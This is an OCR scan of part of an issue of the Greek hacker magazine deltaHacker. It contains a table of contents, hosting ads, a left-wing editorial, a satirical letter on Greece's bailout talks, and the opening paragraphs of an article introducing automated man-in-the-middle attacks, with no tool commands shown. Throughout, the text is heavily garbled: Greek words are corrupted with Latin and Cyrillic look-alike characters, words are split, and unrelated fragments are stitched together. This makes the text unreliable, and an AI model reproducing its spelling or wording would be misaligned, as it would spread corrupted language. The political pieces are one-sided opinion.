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Πώς θα θωρακίσετε rov server σας oro cloud 
Αυτοματοποιηµένες επιθέσεις Man-in-The-Middle 
Ασφαλή αλλά password-less logins, µε το OpenSSH . 

Γνωρίστε τη γλώσσα Brainf*ck - και καλή σας τύχη 


„——— 


a, 


[]...απλώνεται σε τουλάχιστον δύο clouds :/ 


Se 


Now you see me, now you don't 


"Δεν ξέρω / Δεν απαντώ" 


Γνωριμία µε το MITM Pentesting Opensource 
ΤΟΟΙΚΙ και παραδείγματα επιθέσεων 


Εκτός από τέχνη, ο προγραμματισμός 
αποτελεί και πρόκληση 


О τόπος δεν χωράει, τον server 
που σας προτείνουμε να φτιάξετε 


Σας κούρασε κάπως αυτή η γλώσσα; 
Και πού να διαβάσετε τη συνέχεια ;) 


О server που φτιάχνουμε εἶναι πρωτότυπος, πρέ- 
πει όµως να είναι «και ασφαλής 


Μετά την κουραστική αλλά απαραίτητη αναφορά 
σε βασικές προγραμµατιστικές δομές, περνάμε σε 
πιο σύνθετα και πιο ενδιαφέροντα ζητήματα 


'Evag server, 


Μόνιµη γέφυρα µεταξύ compute και storage! 
http://deltahacker.gr/actsubs-1srv2clouds-p33 


OpenSSH και ασφαλη logins 


passwords 
http://deltahacker.gr/openssh-secure-passwordless-logins 


Εκδότης / Διευθυντής Χρήστος Βαρελάς 

Αρχισυντάκτης Παναγιώτης Βαρελάς 

Σύμβουλοι ἐκδοσης Νίκος Μουρατίδης, Βούλα Παυλίδου 

Σύνταξη Παναγιώτης Βαρελάς, Χρήστος Βαρελάς, Ανδρέας 


Βενιέρης, Γιώργος Γιάννου, Μανώλης Kiayiac, Πέτρος 
Κυλαδίτης, Νίκος Μουρατίδης, Θωμάς Σερµπίνης, Μέσος 
Παπαδόπουλος (ΤΜ), Χρίστος Τόμπρας 


Γραμματικἠ επιμέλεια Βούλα Παυλίδου 


Καλλιτεχνική Επιμέλεια Πέτρος Φιλιππίδης 


To ηλεκτρονικὀ περιοδικὀ deltaHacker εἶναι συνδρομητικὀ και εκδίδεται and την Par- 
abing Creations δώδεκα φορὲς το χρόνο, κἆθε µήνα. Н Parabing Creations έχει την 
ἑδρα της στην Καλαμαριά Θεσσαλονίκης. О δικτυακός τόπος του περιοδικού εἶναι στο 
http://deltahackergr. To email επικοινωνίας εἶναι το talk2us@deltahacker.gr και ειδικἁ 
για τις συνδρομές εἶναι το subscriptions deltahacker.gr. Οι γενικὲς πληροφορίες για τις 
συνδρομὲς παρατίθενται στο http://deltahacker.gr/subscriptions και οι ἴδιες οι παραγγελίες 
γίνονται ano το http://deltahacker.gr/pdfi2order. Όλες οι απὀψεις που εκφράζονται στα 
άρθρα δεν εκφράζουν апараітпта και τη γνώμη του περιοδικού. 


YOUR VERY OWN PLAYGROUND IN THE CLOUD. 
SECURE & GREEN. PAY AS YOU GO. 


Keep your data in Iceland and take advantage of GreenQloud's cloud 
services powered by abundant, stable and cost effective, clean energy 


* Up to 16 CPUs and 32gb RAM * Network separation at the 
in the KVM hypervisor hardware level 


O 


* 64-bit server image templates “ Dedicated IP address апа 
including Ubuntu, Debian, reserved bandwidth 


FreeBSD, CentOS and more 
* EC2 compatible 


ComputeQloud™ * Built-in firewall 
Host & Manage * Instant scalability 
* In-browser noVNC client and : 
full root access via ssh * Online dashboard 


C 


* Triple-redundant storage * S3 compatible 
* Full encryption * Bucket websites 
StorageQloud™ * Sync across all platforms * Automatic load-balancing 


Backup & Share 


For more information visit our webiste: www.greenqloud.com 


Now you see me, now you don't 
by spiral evOlutiOn 


Φίλες και φίλοι, 


ο О τίτλος αποτελεί μία апо τις ατάκες των ελεύθερων σκοπευτών (snipers), 
στο δηµοφιλέστατο RTS "Command'n'Conquer". Δεν θυμάμαι тора την ÈK- 
бооп του παιχνιδιού, αλλά αυτό δεν ἐχει και τόση σημασία. Όταν πάντως 
ακουγόταν η ατάκα, αυτὀ σήμαινε ὁτι η μονάδα αξιοποιούσε προχωρημένες 
TEXVIKEG κἀλυψης/απόκρυψης, προκειµένου να κινεῖται γρήγορα και χωρίς va 
γίνεται αντιληπτή ano τον αντίπαλο. Н αληθινή φύση αυτών των εικονικὠν 
ελεύθερων σκοπευτῶν -TO ποιοι ἦταν και TO τι πετύχαιναν µε TOON χάρη- 
εξαφανίζονταν πίσω апо µια µικρή θολούρα στην οθόνη. 


Παρόμοιες μεθόδους αξιοποιεί και η σηµερινή κυβέρνηση. 


βερνητικἁ στελέχη των ANEA. Παϊΐζουν κι αυτά το ρὀλο τους: υφίστανται. 
Κι αυτὸς ο ρόλος εἶναι σπουδαίος, γιατὶ paci τους υφίσταται και η σημερινή 
κυβέρνηση. Μέχρι εκεἰ ὁμως. Πα την opa δεν xw εντοπίσει κάποιου εἶδους 
πολιτικἠ πἰεση апо πλευρὰς ANEA. ‘Exel σηµασἰα να το θυμόμαστε auro, δι- 
ότι δεν θα αργήσει η μέρα nou κἀποιοι οπαδοἰ του ΣΥΡΙΖΑ θα επικαλεστούν 
τη συµµετοχή των ANEA, yia τη "δεξιὰ στροφή" που τάχα επιβλήθηκε στην 
κυβέρνηση. 


Πώς einate; Κάποιοι το λένε ἠδη; Επιτρέψτε µου να µην ασχοληθώ περισσὀ- 
τερο µε αυτούς και να σταθώ στα μέλη διαφόρων "αριστερών συνιστωσών" 
του ΣΥΡΙΖΑ, που "εκφράζουν ανησυχίες" για την πορεία της κυβέρνησης και 
µε κάθε ευκαιρία "διατυπώνουν τις ενστάσεις τους". Παίζουν κι αυτοί το ρὀλο 
τους: υφίστανται, µε αυστηρότητα. 


Eixa δεν εἶχα όμως, ἄνοιξα πολλά ζητήματα. Ας επιστρέψω σ' auró nou 6e- 
оро κύριο. 


Н κυβέρνηση δεν απαρτίζεται ano ελεύθερους σκοπευτὲς που κουβαλάνε 
τυφέκια και μαχαίρια, τοποθετούν φύλλα και κλαδάκια στο κεφάλι τους ἡ 
φοράνε στολὲς παραλλαγἠς. Тоа-іса που για τις στιλιστικὲς επιλογὲς των 
προβεβλημένων στελεχών δεν θα μπορούσε каміс va παραπονεθεί. 


Παρ' όλα αυτά, παρουσιάζουν µια σηµαντικἠ ομοιότητα µε τους snipers του 
Command'n'Conquer: Εφευρίσκουν απλὲς και αποτελεσματικές μεθόδους, 
για va συγκαλύπτουν την πραγματική φύση των πραγμάτων. 


Δεν σκοπεύω να σχολιάσω τη μετονομασία της Τρόϊκα σε "θεσμούς", οὐτετην 
αναβάπτιση rou μνημονίου σε "σύμβαση". Αυτά εἶναι пала уға. Την περασμὲ- 
νη βδομάδα, η κυβέρνηση παρουσίασε κι επἰσημα ¿vav ακόµα νεωτερισμὀ: То 
νομοσχέδιο για την αντιμετώπιση της "ανθρωπιστικής κρἰσης". 


Και κάπως ἑτσι, μετέτρεψαν το αποτέλεσμα σε аітіо. Πήραν Eva апо τα ou- 
μπτώματα της καπιταλιστικἠς οικονομικής κρἰσης, τη διαρκἠ και εντεινόµενη 
φτωχοποίηση του κόσμου της εργασίας, και το παρουσίασαν σαν αφετηριακἠ 


Συγνώμη, συγκυβέρνηση ἤθελα va πω. Δεν σκὀπευα να υποβαθμίσω τα Ku- | 


а 


αιτία των προβλημάτων. Δεν υπάρχει τίποτα апо πἰσω. Μόνο µια ανθρωπιστικἠ 
κρίση, γενικἀ και αὀριστα. 


Αν η μετονομασία της Tpóika σε "θεσμούς" αποτελεἰ µια χαριτωμένη εκφραστικἠ 
αναδίπλωση, εδὠ μιλάμε για µια απὀπειρα αντιστροφἠς της πραγματικότητας. 


Αυτἠ η προσπάθεια, φίλοι και φίλες, εἶναι πολύ χειρότερη апо τη μετονομασία 
της Tpóika ἡ του μνημονίου. Edm δεν προσπαθούν να αποφύγουν µια ἐκφραση 
που ἐχει το στίγμα του "μνημονιακού" ἡ του "δεξιού" πολιτικού. Το αντίθετο. 
Αποφεύγουν µια ἐκφραση nou θα μπορούσε να λειτουργήσει ακόµα και σαν 
ἄλλοθι "αριστεροσύνης", yiari αυτό που τους καίει εἶναι να κρύψουν το πραγ- 
µατικὀ airio των προβλημάτων. Ανάμεσα στη διατήρηση rou "αριστερού προφίλ" 
και στην υπεράσπιση του καπιταλιστικού τρόπου παραγωγἠς, npokpivouv το 
δεύτερο. 


Σας κάνει εντύπωση που προσπαθούν να παρουσιάσουν την κρίση σαν anor£- 
Лесна κακἠς τύχης ἡ κακἠς διαχείρισης κι Ох! σαν εγγενὲς χαρακτηριστικὀ TOU 
καπιταλιστικού τρόπου παραγωγἠς; Σας φαίνεται παράξενο που µια "αριστερή" 
κυβέρνηση υπερασπίζεται Eva εκμεταλλευτικὀ σύστημα; Να σας θυμίσω Ori Eni 
ΠΑΣΟΚ εἶχαμε "σοσιαλιστικές" κυβερνήσεις που ξεπουλούσαν δημόσια περιου- 
σία και ἐδιναν фороапаллЛаүғс̧ σε εφοπλιστὲς και μεγάλους βιοµήχανους. Qu- 
ока, τίποτα an' όλα αυτά δεν παρουσιαζόταν ἐτσι. Μιλούσαν για επιβεβλημένες _ 
κινήσεις "εξυγίανσης" του δημοσίου και για "επενδυτικά κἰνητρα". A 


Πώς einate; Ta ἴδια συμβαίνουν και тора; E, τι "σοσιαλισμός", τι "αριστερά"... 
Στη δικἠ τους γλὠσσα, εξ ου και τα εισαγωγικἀ, οι λέξεις ἐχουν γίνει λάστιχο. 
Οι ἐννοιες, апо кала δομημένες κατασκευὲς της ανθρώπινης σκέψης, ἐχουν 
μετατραπεί σε χυλὀ. 


Тора όμως κινδυνεύω να τους μοιάσω. Το πρόβλημα που έχουμε μπροστά µας 
δεν εἶναι γλωσσικὀ. Н κυβέρνηση δεν κινείται στη συγκεκριμένη κατεύθυνση li 
επειδἠ η γλὠσσα ἐχει υποστεί κἄποια βλάβη. H γλὠσσα, όμως, υπόκειται σε = 
Evav διαρκἠ βιασμὀ, για va δικαιολογηθούν οι επιλογὲς της κυβέρνησης. 


Н καταστροφἠ της γλὠσσας, αυτού του απαραϊτητου εργαλείου για τη σκέψη, 
δεν αποτελεὶ ζήτημα προς υποτίμηση. Ωστόσο, αφορμὴ για όλα τα παραπάνω 
στάθηκε η προκλητικἠ απάτη που επιχειρείται µε το VEO νομοσχέδιο. 


Μπορεἰ ἑνα νομοσχέδιο που δεν εντοπίζει το праүратіко αἰτιο των προβλημά- 
των, να δώσει ουσιαστικὲς λύσεις; Σκεφτείτε το διαφορετικά: Μπορεί να λύσει 
Kaveic Eva πρὀβλημα, отау δεν εντοπίζει (ἡ επιλἐγει να αγνοήσει) τα δεδομένα; 


Στο πρὀσφατο Πούρογκρουπ, ο κ. Ντράγκι εἰπε бт! τα τελευταία χρόνια η EÀ- 
λάδα ἐχει δανειστεἰ περὶ τα 100 δισεκατομμύρια ευρώ. Προσέξτε τώρα κάτι 
ενδιαφἐρον: Τα τελευταία χρόνια, οι εργαζὀμενοι βλέπουν τους μισθούς και 
τις συντάξεις να κατρακυλούν, ενώ χάνουν και то Eva δικαίωμα μετὰ το алло. 
Μιλάμε για διπλὀ και ανελέητο χτύπημα. Την ἴδια στιγµή, βιομήχανοι, τραπεζ]- 
τες και εφοπλιστές, αποκτούν επενδυτικἁ кімптра, δέχονται πακέτα στήριξης 
κι ενέσεις ρευστότητας, ενώ συνεχίζουν να αυξάνουν τον πλούτο τους. Σωστὰ 
διαβάσατε. Ο πλούτος τους αυξάνεται. 


——44 
ο 
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Αυτά προς ro napóv - χαρείτε ro τεύχος σας - та λἐμε Eava σύντομα! 


Mepikoi "μικροί" βιομήχανοι μπορεί va καταστράφηκαν, ενώ n κερδοφο- 
pia πολλών μεγάλων επιχειρήσεων περιορίστηκε. AUTO орос δεν αλλάζει 
την ουσία του πράγματος: О πλούτος συγκεντρώθηκε σε ακόμα Aryó- 
тєра xépia. Εξάλλου, το γεγονὸς бт! περιορίστηκε ο ρυθμός αύξησης 
των κερδῶν, δεν σημαίνει От! οι συγκεκριμένοι επιχειρηματίες ἐγιναν 
φτωχότεροι. 


To nog ακριβώς μοιράστηκαν τα 100 δισεκατομμύρια ευρώ δεν το γνω- 
ρίζω. Γνωρἰζω µόνο ro πού κατέληξαν και, κυρίως, το ποιος καλείται va 
πληρώσει τα δάνεια. 


Αλλά εντάξει, εμείς δεν χρειάζεται πλέον ν' ανησυχούμε: έχουμε κυβἑρ- 
νηση που διαπραγματεύεται σκληρὰ. Βλέπετε, το κυβερνητικὀ επιτελείο 


μελέτησε την κατάσταση ενδελεχώς και ἐβγαλε va σημαντικὀ συμπὲ- . 


расра: Н εντεινόµενη εκμετάλλευση των εργαζομένων, το γεγονὸς бт! 
η ζωή µας γίνεται πιο δύσκολη, την ἴδια στιγμή που οι επιστήμες και η 
τεχνολογία εξελίσσονται, οφείλεται στην αυστηρή δημοσιονομική πολι- 
τικἠ που εφαρµόζεται στην Ευρώπη και στην κακἠ διαχεἰριση των про- 
ηγούμενων κυβερνήσεων. 


Πολύ кало κι αυτό, δε λέω. Μόνο που στις НПА, εκεἰ ὁπου εφαρμόζεται ` 


χαλαρή δηµοσιονοµικἠ Πολιτική, υπάρχουν 46 εκατομμύρια ἄνθρωποι 
που ζουν κάτω апо το оро της φτώχειας και επιβιώνουν апо τα συσσἰ- 
Tia. Κάτι αντἰστοιχο ισχύει και για την Ευρώπη συνολικἁ, που μετράει 
124 εκατομμύρια κάτω απὀ το ὁριο της φτώχειας. Τι ἐγινε, βρε παιδιά; 
Εἶχαν ki εκεἰ κακοδιαχείριση; 


Εγώ πάντως μόνο Eva κοινὀ εντοπἰζω σ' ὀλες αυτὲς τις χώρες: Tov Ka- 
πιταλιστικὀ τρόπο παραγωγἠς. Και μπορεί η σημερινὴ κυβέρνηση va δι- 
απραγματεύεται, αλλά όταν ζητάει апо μένα να πληρώσω καταλαβαίνω 
ότι δεν παλεύει για μένα. Μπορεὶ να ἐχει διαφορετικἠ NOAITIKN апо τις 
προηγούμενες κυβερνήσεις, αλλά υπηρετεί τον ἰδιο σκοπό: Την υγιή επι- 
χειρηµατικἠ ανάπτυξη, την ανάκαμψη της οικονοµίας και δεν ξέρω κι 
eyw πὠς θέλετε να το πείτε. Σημασία ἐχει От! στηρίζουν κι αυτοί Eva 
οικονομικό σύστημα που οδηγεί *avanógsukra* στη φτώχεια ολόκληρα 
εκατομμύρια ανθρώπων. 


Πάντως για κωλοτούμπες δεν μπορώ να τους κατηγορήσω. Στο πρὀ- 
үрарра της Θεσσαλονίκης υποσχέθηκαν ψίχουλα και HE TO VEO νομοσχὲ- 
διο δίνουν ακόµα λιγότερα. Και γενικότερα, διακρίνω µια συνέπεια στη 
γενικἠ κατεύθυνση της πολιτικἠς τους. 


Σε алла νέα, пара την αβεβαιότητα και τη θολούρα, µε χαρὰ μπορὠ va 
αναφέρω ὁτι η ομάδα του περιοδικού δεν εφησυχάζει κι ετοιμάζει νέα 
πράγματα. 

Να, кат! για £vav γρηγορότερο file host ακούω, κάτι για άρθρα του πε- 
ριοδικού που θα εἶναι διαθέσιµα στο site μόνο για τους συνδρομητές και 


συχνὰ πριν ακόµα διανεμηθεί το PDF, кат! για video tips που προγραμ- 
µατίζονται κι ἐρχονται και θα δημοσιεύεται Eva ava βδομάδα κ.λπ. κ.λπ. 


Όμως καλύτερα να µην αποκαλύψω алла. 


Όχι τίποτε GAAo, алла µας αγχώνεται ο υπεύθυνος και δεν τον θέλουμε 
αγχωμένο (γιατὶ μετὰ τρελαίνει KI εμάς). 
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OVELA peur 


Αγαπητοί µου, 

Ἡρθε η ώρα να το παραδεχτώ καν δημοσίως. Έχω πρόβλημα pe τις τεχνο5 
λογίες επικουνωνίας και δικτύωσης. 

Н, μάλλον, για να είµαν καν πιο ОЧАР ox µε τις ἴδιες τις τεχνολογίες 
αλλά µε τις χρήσεις τους. 

To φέισμµπουν ας πούμε. 

Оло, ξημεροβραδιάζονταν στο φένσμπουκ. E, λοιπόν, δεν το παταλαβαί- 
уш. Γνατί το χάνουν: Tv εννοούν; Tv κερδίζουν} 


¢ o 


Δεν το καταλαβαύνω καθόλου. 

(Ent τη ευκαιρία να διευκρινίσω πως πίσω албо την σελίδα φαν που έχει 
ανοίξει στο ὀνομά µου στο φέισµπουν και φιλοξενεί τούτες τις επιστολές 
βρίσκεται ο ανιὠνός, νομίζω, χωρίς να µε éxev ενημερώσει καν, το KUPLO— 
TEPO, χωρίς να έχεν ζητήσει τη γνώμη μον. Δεν µε ενοχλεί βέβαια, αλλά το 
σωστό να λέγεταν. Δεν είναι δυχνά pov.) 

H το tovitep. 

ΟΚ, καταλαβαίνω. ἄταγκ. Τουντ. Pe-tovit. 140 χαρακτήρες. 

Αλλά να, βλέπω τον ένα καν τον άλλο στα λεωφορεία πολληµένους στα 
πινητά τους καν απορώ. La ποιόν λόγο το κάνουν αυτό; Tv εννοούν; Tr 
κερδίζουν; 

Μέχρι πρότινος ερµήνευα αυτή µου τη δυσκολία να καταλάβω ως θέµα 
ηλικίας. 

E, τι να κάνω, σκεφτόμουν. Μεγαλώσαμε. Κάπονα πράγματα δεν είναν yra 
µας. O Τζάστιν Νπήμπερ ας πούμε. Tv δουλειά έχω εγώ µε τον Τζάστιν Μπή- 
рлер; 

Εγώ Κλούβιος, Σουβλίτσα, Μπαρμπα-Μυτούσης καν πολλά λέω. 

Αλλά τν ηλικία; Εδώ κοτζάμ υπουργοί, πού τους χάνεις πού τους Bpi- 
σχεις, στα τονίτερ καν στα φένσμπουχκ. Υπουργοί, έτσι; Με υπουργείο. 

O επί των οικονομικών, Καθηγητής. Διεθνούς φήμης. Σταρ. 

E, πού τον χάνεις, πού τον βρίσκεις, στην τηλεόραση εἶναι να κάνεν ôn- 
λώσεις ἡ στο τονίτερ να τσακώνεται για το πώς παρερμηνεύτηκαν OL δηλώ- 
σεις του. 

Н о άλλος, o επί των εξωτερικών. Εμβρυθής διεθνολόγος. Φορτωμένη 
ατζέντα HAL λοιπά. Κι αυτός µια алб τα ίδια. Από το πρωί ὡς το βράδυ σε 
γεύματα εργασίας ἡ στο τουίτερ να πολεμάει τους εχθρούς της πατρίδας. 

Καν ον δύο τους βέβαια άνθρωπον PLAG κάποιας ηλικίας. 

Хин. 

Τέλος πάντων, λέμε τώρα. To θέμα εἶναι πως ξέρουν τις νέες τεχνολογίες 
καν τα κοινωνικά δίχτυα καλύτερα XV απ’ τις τσέπες τους. 

Τα βλέπεν όλα αυτά о λαός, χαίρεται. Επικροτεί. Νονώθεν αξιοπρεπής. 
Φουσκώνεν το στήθος. To κεφάλι φηλά. Πολύ ONAG. 

Ογδόντα τοις εκατὀ, αγαπητοί pov. 

Γνα το ποσοστό αποδοχής των χειρισμών καν της παρουσίας της νέας 
πυβέρνησης λέω. Ογδόντα τοις εκατό. Σε τυχαίο δείγμα, αντιπροσωπευτικό 
του πληθυσμού, 
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Παιδιά, το λέω καθαρά. Εμένα η πολλή αποδοχή δεν µου κάνει για καλό. Με φοβίζει σαν κακός 
Ονωνός. 

Ενδυκά όταν εἶναι τόσο ασαφές τι είναν αυτό που όλον τόσο ένθερµα αποδεχόµαστε. 

Όλον. To 80% όλων εννοώ. 

Λιαπραγμάτευση, σου λέει ο άλλος. Περηφάνεια. Εντάζει. Πράγματι, υπήρχε ένας τσαμπονκάς 
σε όλο αυτό, ένας αέρας άνεσης πρωτόγνωρος για τα ελληνικά δεδομένα. 

Ἠξεπλάγησαν όλον. Αναρωτήθηκαν. Έγραφαν άρθρα. 

Αλλά όταν καταλάγνασε ο πουρνιαχτός τα πράγµατα επανήλθαν στις κανονικές τους διαστά- 
σεις. 

Αγαπητοί µου, 

Επιτρέφτε μου να εκφράσω κάπονες σκέφεις. 

θα αποφύγω να επικεντρωθώ σε θέµατα γενικῆς ουκονομυκῆς πολιτικής. Στο κάτω κάτω στα 
γενικά συμφωνούμε. Κακό πράγμα т λιτότητα και η ανεργία, καλό πράγμα η ανάπτυξη καν το 
κοινωνικό κράτος κ.λπ. 

Κατά τη γνώμη μουν, λοιπόν, το πρόβλημα που παρουσιάστηκε κατά τις πρόσφατες διαπραγ- 
ματεύσεις καν συνεχίζεν, εν πολλοίς, να µας ταλαιπωρεί, δεν είχε να κάνει µε τον υπουργικό 
τσαμπονκά. Δεν είχε να κάνεν µε τις προεκλογικές δεσμεύσεις καν τη νωπή εντολή προς την νέα 
κυβέρνηση. Δεν είχε καν να κάνεν µε την αδιαλλαξία των άλλων, WG τέτοια. 

Περισσότερο είχε να κάνεν µε τη γνώμη που εἶχε о καθένας απὀ τους λεγόμενους "εταίρους" 
γνα την ρεαλιστικότητα των προτάσεων του Κυρίου Υπουργού. 

Αν ήταν σαφές ἡ έστω ορατό πως το σχέδιο των Ελλήνων θα μπορούσε να αποφέρει συγκενρι- 
μένους καρπούς, νομίζετε πως θα άφηναν τον Σόνμπλε να κάνεν τον σκληρό; Γνα λίγο val, αλλά 
µετά θα τον έπαιρναν κατά µέρος καν θα του δίναν ξύδν. 

Ποιοι; Όλον. Γνατί στην πραγματικότητα η κατάρρευση της Ελλάδας --αναπόφενκτη αν δεν τα 
βρούμε-- δεν συμφέρειν κανέναν. Κάθε σοβαρός παρατηρητής καταλαβαίνει πως η κατάρρευση της 
Ελλάδας σημαίνει κατάρρευση του ευρώ. Σε © pe ІЗ μήνες. 

Αυτό το βλέπουν όλοι. 

Ον Αμερικάνοι, ας πούμε. Tv νομίζετε πως τον έπιασε τον Ομπάμα χειμωνιάτικα καν άρχισε τις 
παρασκηννακές πιέσεις υπέρ των ΒλλήνωνΣ Να ήταν η ὀῴφιμη αγάπη του για τις θέσεις της Άριστε- 
PNG Πλατφόρμας -- ἡ μήπως πείστηκε από την ανάλυση της K.O.E. γνα την Ευρωζώνης 

Н κατάρρευση του ευρώ δεν εἶναι προς το συμφέρον κανενός. Ούτε των Ελλήνων, όπως ακούω 
να µας παραμνθιάζουν διάφορον από τηλεοράσεως ἡ υντερνέ καν δαυµονίζοµαν, οὐτε κανενός. 

Ον µόνον που θα κέρδιζαν θα ήταν ον σπεκουλαδόρον µεγαλοκαρχαρίες ένθεν κακείθεν του Ατ- 
λαντικού. Κανείς άλλος. Оло, OL άλλον θα βγουν χαμένου. 

Όταν λέμε όλον εννοούμε όλον, xav όταν λέμε χαμένοι εννοούμε χαμένου. θα γίνει χαμός. Αν 
καταρρεύσει το ευρώ, η τωρινή κρίση στην Ελλάδα θα εἶναι σαν µια γλυκιά ανάμνηση. θα καθό- 
μαστε τα βράδια στο τζάκι παν θα αναπολούμε τα χρόνια εκείνα τα όμορφα, τα παλιά. 

Καν ὀχν, δεν θα καταρρεύσεν ο Καπιταλισμός. 

Εδώ εἴμαστε, να µου το θυμηθείτε. 

τέλος πάντων. 

Αφού λοιπόν είναι έτσι, 
γνατί το παίζουν τόσο δύσκο- 
λον Exel στην Ευρωζώνης Για να 
δώσουν την ευκαιρία στον ένα 
ἡ τον άλλο υπουργό να αρχίσεν 
τους κανγάδες µέσω τουίτερ; 

Όχν βέβαια. 

To πρόβλημά τους είναν 
πως ον προτάσεις των Βλλή- 
νων ακούγονται ασαφείς καν 
γενικόλογες. Ελαφρώς εντός 
θέματος -- καν σίγουρα εκτός 
χρόνου. 


12 


OVELA ELA 


V HAGKER 


NNN 


Είναι απίστευτο αλλά ακόµα και σήμερα, ον βασικοί άξονες των ελλη- 
ννκών προτάσεων, αυτών που µε τα χίλια орко, συμφωνήσαμε, αναφέρονταν 
στην απλοποίηση της Υραφειοκρατίας, την εξορθολόγηση του φορολογικού 
συστήµατος και των διαδικασιών της φορολογικής δικαιοσύνης, ἡ στην πά- 
ταξη της φοροδιαφυγής. 

Εδώ µπορεί να το έχουμε ξεχάσει, αλλά στην Βυρώπη θυμούνταν καθαρά 
πως τέτοιες ήταν OL δεσμεύσεις µας алб το πρώτο κιόλας Μνημόνιο. Στην 
πραγματικότητα, αυτό ακριβώς ἥταν το Μνημόννο. Mia σειρά оло κοστολο- 
γημένες δεσμεύσεις συστηµικών παρεμβάσεων, 

Καν η δουλειά της Τρόνκας ήταν να τσεκάρει πως προχωράμε σωστά. 

"Σωστά": εν προκειμένω, πως καταφέρνουµε να µενώσουμε το έλλειμμα 
(λόγω του οποίου άλλωστε δανειζόμαστε). 

Στα μάτια της Ἰρόικας η µείωση μισθών xav η αύξηση της φορολογίας 
ήταν το ύστατο ретро που θα έπρεπε να πάρουμε αν δεν καταφέρναμε, ας 
πούμε, να χτυπήσουµε τη διαφθορά ἡ τη φοροδιαφυγή. θυμάστε την συζήτη- 
ση για τα "ισοδύναμα" µέτρα} Αυτό σημαίνειν "ισοδύναμα". Αν δεν πιάσει το 
ένα, κάνε TO ἀλλο. 

Λέμε για μνημονιακές κυβερνήσεις, παραβλέποντας πως αυτές ήταν ον 
πρώτον πολέμνου του Ννημονίου. Ούτε ήθελαν ούτε μπορούσαν να υλοπον- 
ήσουν το Μνημόνιο. Σκαρφίζονταν τον ένα φόρο πάνω στον άλλο, κατέ- 
στρεφαν τον ιδιωτικό τοµέα, άφηναν την ανεργία να επτοξευτεί, μόνο καν 
μόνο үш. να καλύφουν алб πλευράς εσόδων τις υποχρεώσεις της χώρας καν 
να αξιολογηθούν σωστά and την Τρόικα. Κατά τα άλλα, έβγαιναν µετά καν 
κατηγορούσαν τους ξένους για τις κακοτυχίες µας: "Δεν φταίμε εμείς. Μας 
ανάγκασαν." 

Άσε ρε κολλητέ, λες καν ήρθε o Ίόμσεν και σε ανάγκασε να εμπνευστείς 
το χαράτσι ἡ τον ΒΝΦΙΑ. Μόνο τα έσοδα ὀόφειλες να αυξήσεις, καν να µει- 
ώσεις το κόστος του κράτους. θα μπορούσες να το κάνεις µε πάταξη δια- 
φθοράς και καταπολέμηση της φοροδιαφυγής. Δεν το έκανες. Αυτό. Τελεία. 

"Δια την υπεράσπισιν, ουδέν σκεπτικὀν θελκτυκότερον του απαλλακτικού”", 
όπως έλεγε προ ημερών στην ЕВГА της γεντονιάς O x. θωμάς, o Δικαστικός. 

To παραμύθι της κακής Τρόνκας то χάῴαμε όλον. Ги αυτό τη λέμε τώρα 
"θεσμούς", γνα να µην ακούει "Τρόικα" το μωρό καν κλαίεν. 

Κάπως την έχουμε δεν, όλον εμείς σ' αυτήν εδώ τη χώρα, καν µας αρέσεν 
να πιστεύουμε πως είµαστε στόχοι και θύματα μεγάλων δυνάμεων που µας 
επιβουλεύονταν καν µας ζηλεύουν. 

Ον Αμερικανοί. Το µεγάλο κεφάλαιο. Ον Τούρκου. Ον Εβραίου. Н Μέρκελ. 
Ον Γερμανοί. Ον Αγορές. 

Πάντα ον άλλον φταίνε. Όλοι είχαν (καν συνεχίζουν να έχουν) κάτι να 
κερδίσουν από την ταπείνωση καν την ήττα µας. Αυτό τουλάχιστον λέει η 
εθνική µας αφήγηση. 

Αυτό που δεν λέει είναν το εξής: Tv διάολο τρέχει µε τη διαφθορά, την 
πακοδιοίκηση καν την φοροδιαφυγή καν δεν μπορούμε να τα χτυπήσουμε 
τόσα χρόνια τώρα; Κόπκαλα έχουν; 

Στο σχετνκό δηµοσκοπικό ερώτημα, το 802 xav βάλε του φουσκωτού από 
την περηφάνενα Σοφού µας Λαού (TM), βρίσκεν εὐκολα την απάντηση: 

Δεν ξέρω / Δεν απαντώ. 


Σας ασπάζομαν, 
θείος Ακάκυος 


4 
DigitalOcean 


Ταχύτατα VPSes στο cloud, σε hosts µε δίσµους SSD. 
Επιθογή datacenter σε Ευρώπη, Αμεριμή μαι Ασία. 
Lean-mean control panel, yia απόῆυτο έβεγχο. 


Αποητήστε τώρα το δικό cas VPS, 

στο cloud της DigitalOcean. 

Κάντε KAIK στο http://bit.ly/digocean10off 
ка! κερδίστε αυτομάτως 105 σε credit. 


Hint: Επιβέγοντας το шкрб πϑάνο, 

πάντα µε KAIK στο http://bit.ly/digocean10off, 
ουσιαστιµά έχετε δύο µήνες δωρεάν για ένα VPS 
µε 512MB RAM, 20GB SSD και 1TB transfer. 


mH Δεν είναι кї ἄσχημα 


Αυτοματοποιημένες επιθέσεις MITM 


Για την επικινδυνότητα των επιθέσεων Man-in-the-Middle έχουµε μιλήσει αρκετὲς 
φορὲς στο παρελθὀν. Av και εἶναι εξαιρετικά δημοφιλείς και πολλά υποσχόμενες, η 
επιτυχία τους εξαρτάται ano πολλούς παράγοντες. Ένας ano αυτούς σχετίζεται µε 
την ἴδια την προετοιμασία της επίθεσης, που δεν αποτελεῖ καθόλου απλἠ υπόθεση. 
Μια επίθεση ΜΙΤΜ απαιτεί το συνδυασμὀ πολλών διαφορετικών εργαλείων, τα οποία 
δεν φημίζονται για την ευχρηστία τους. Ευτυχώς, υπάρχει Eva npóypappa που 
αυτοματοποιεἰ ὀλη την επίπονη διαδικασία της προετοιμασίας και µας επιτρέπει va 
τσεκάρουµε ταχύτερα την ασφάλεια και τις αντοχὲς ενὸς συστήματος. Αναφερόμαστε 
στο MiTM Pentesting Opensource TOOIkit. 


Πυτοματοποιημένες επιθέσεις MiTM 
Αα 


Οι επιθέσεις Man-in-The-Middle (ΜΙΤΜ) πρωταγωνιστούν συχνά-πυκνάἁ στη θεµατο- 
λογία του περιοδικού. Εξάλλου, αποτελούν τις πιο δημοφιλείς επιθέσεις EVTOG των 
τοπικὠν δικτύων (KI Ох! μόνο). Πα τους νεοφερμένους, να πούμε бт! σε µια τἐτοια 
επίθεση o κακόὀβουλος χρήστης παρεμβαίνει ανάμεσα σε δύο συστήµατα-συνομιλη- 
τὲς και υποκλέπτει όλα τα διακινούμενα δεδομένα (yia την ακρἰβεια ӧіктоака πακὲ- 
τα). Па να γίνει δυνατὀ κάτι τέτοιο, ο εισβολέας πραγματοποιεί µια πλαστογραφία 
και παρουσιάζεται σε καθέναν апо τους συνομιλητές µε την ταυτότητα του ἄλλου. 
